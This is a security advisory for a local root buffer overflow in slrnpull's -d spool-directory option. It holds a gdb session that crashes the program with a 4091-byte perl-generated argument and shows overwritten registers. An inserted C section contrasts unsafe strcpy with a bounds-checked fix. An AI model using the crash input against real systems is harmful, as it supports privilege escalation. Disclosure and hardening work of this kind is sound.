© Neurowork™ 2010. All rights reserved.
Syb Security is a business unit of Neurowork™

Advisories

SYBSEC-ADV08: Slrnpull -d SPOOLDIR Buffer Overflow

Title: Slrnpull -d SPOOLDIR Buffer Overflow
ID: SYBSEC-ADV08
Severity: HIGH - Local Buffer Overflow
History:
10.APR.2002 Vulnerability discovered
15.APR.2002 Vendor contacted
Scope: Local Buffer Overflow Vulnerability
Platforms: All Linux Flavors
Author:
URL: http://www.sybsecurity.com/advisors/SYBSEC-ADV08-Slrnpull_Spool_Directory_Command_Line_Parameter_Local_Buffer_Overflow_Exploit
Release: Public
Overview
slrnpull is a program used for pulling newsfeeds from an NNTP server to a local spool directory, which can be read locally by a newsreader program.
Affected versions
The vulnerability has been reported in slrnpull on the following systems:

- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
- Wirex Immunix OS 7.0 -Beta
- Wirex Immunix OS 7.0
- Wirex Immunix OS 6.2
Description
Some versions of slrnpull are vulnerable to a buffer overflow. By specifying an overly long SPOOLDIR (spool directory) path with the -d command line argument, a local attacker can overflow a fixed-size buffer and execute arbitrary code on the system with root privileges.
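The unchecked copy pattern the description implies, beside its bounds-checked form, as an added C example. This is not slrnpull's source (the advisory quotes none); the buffer size SPOOL_MAX, the function names, the return codes and the default spool path are constructed for illustration. It also shows the check the gdb session below argues for: the log prints "File name too long" and then "slrnpull started", so the over-long value was noticed but not treated as fatal; here rejection stops start-up.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the hypothetical spool-directory buffer. This value is constructed
 * for the example; the advisory does not state slrnpull's real buffer size. */
#define SPOOL_MAX 256

/* Return codes of the checked setters below (constructed for this example). */
enum { SPOOL_OK = 0, SPOOL_MISSING_ARG = -1, SPOOL_TOO_LONG = -2 };

/* Unchecked pattern, shown for contrast only: strcpy copies until the NUL byte,
 * so an argument of SPOOL_MAX bytes or more writes past the end of dst. The
 * rest of this file never calls it with untrusted input. */
void set_spool_dir_unchecked(char dst[SPOOL_MAX], const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened pattern: measure first, reject anything that does not fit together
 * with its terminating NUL, and copy only after the check passes. dst is left
 * untouched on rejection so no caller can pick up a half-written path. */
int set_spool_dir_checked(char *dst, size_t dstsz, const char *arg)
{
    size_t len = strlen(arg);
    if (len >= dstsz)
        return SPOOL_TOO_LONG;
    memcpy(dst, arg, len + 1);
    return SPOOL_OK;
}

/* Minimal parser for the "-d SPOOLDIR" option named in the advisory. The gdb
 * log shows a "File name too long" message followed by "slrnpull started",
 * i.e. the length problem was noticed but not treated as fatal. Here an
 * over-long value is a hard error and the caller must not start up. */
int parse_spool_args(int argc, char **argv, char *dst, size_t dstsz)
{
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-d") == 0) {
            if (i + 1 >= argc)
                return SPOOL_MISSING_ARG;
            return set_spool_dir_checked(dst, dstsz, argv[i + 1]);
        }
    }
    return SPOOL_OK; /* no -d given: keep whatever default dst already holds */
}

/* Build a constructed argv {"slrnpull", "-d", <n bytes of 'A'>} for testing.
 * storage must have room for three pointers; the caller frees storage[2]. */
char **make_argv_with_long_dir(size_t n, char **storage)
{
    char *a = malloc(n + 1);
    if (a == NULL)
        abort();
    memset(a, 'A', n);
    a[n] = '\0';
    storage[0] = "slrnpull";
    storage[1] = "-d";
    storage[2] = a;
    return storage;
}

/* Run the parser on an n-byte 'A' argument against a default spool path and
 * return the parser's verdict; out (if non-NULL) receives the buffer's final
 * content, which is still the default whenever the argument was rejected. */
int try_spool_arg_of_length(size_t n, char *out, size_t outsz)
{
    char spool[SPOOL_MAX] = "/var/spool/slrnpull"; /* constructed default */
    char *storage[3];
    char **argv = make_argv_with_long_dir(n, storage);
    int rc = parse_spool_args(3, argv, spool, sizeof spool);
    free(argv[2]);
    if (out != NULL)
        set_spool_dir_checked(out, outsz, spool);
    return rc;
}

int main(void)
{
    char spool[SPOOL_MAX];
    /* 4091 bytes: the same argument length the advisory's gdb session used. */
    int rc = try_spool_arg_of_length(4091, spool, sizeof spool);
    printf("rc=%d spool=\"%s\"\n", rc, spool);
    return rc == SPOOL_TOO_LONG ? 0 : 1;
}
```

The design point is that the length check must both include the terminating NUL (`len >= dstsz`, not `len > dstsz`) and make the caller stop; a check that only logs and proceeds leaves the oversized argument to reach whatever unchecked copy comes later, which is consistent with the crash the gdb session shows after the "File name too long" message.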
Workaround
Upgrade to a fixed software version, which you can download from:
http://www.redhat.com
Acknowledgments
This vulnerability has been found and researched by:
- Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
References
Details

[alex@Lab /tmp]$ /usr/bin/gdb /usr/bin/slrnpull
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-redhat-linux"...(no debugging symbols found)...

(gdb) set args -d `perl -e 'print "A" x 4091'`
(gdb) r
Starting program: /usr/bin/slrnpull -d `perl -e 'print "A" x 4091'`
04/15/2002 16:39:45 ***File name too long.
04/15/2002 16:39:45 slrnpull started.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x700f8ad0 in getenv () at ../sysdeps/generic/getenv.c:100
100 ../sysdeps/generic/getenv.c: No such file or directory.
(gdb)

(gdb) inf all
g0 0x0 0
g1 0x1010101 16843009
g2 0x80808080 -2139062144
g3 0x0 0
g4 0x30 48
g5 0x28 40
g6 0x0 0
g7 0xff 255
o0 0x5a540000 1515454464
o1 0xefffeb54 -268440748
o2 0x5a 90
o3 0x54 84
o4 0x6a656374 1785029492
o5 0x72766965 1920362853

sp 0xefffdde0 -268444192
o7 0x700f89f4 1880066548
l0 0xefffeb54 -268440748
l1 0x701c2702 1880893186
l2 0x0 0
l3 0x5a54 23124
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x41414141 1880999612
i0 0x41414141 1094795585
i1 0xfffff974 -1676
i2 0x1 1
i3 0x0 0
i4 0x0 0
i5 0x0 0
fp 0xefffde48 -268444088
i7 0x70152864 1880434788
f0 0 (raw 0x00000000) 0
f1 0 (raw 0x00000000)
f2 0 (raw 0x00000000) 0
f3 0 (raw 0x00000000)

[...]
Exploit tool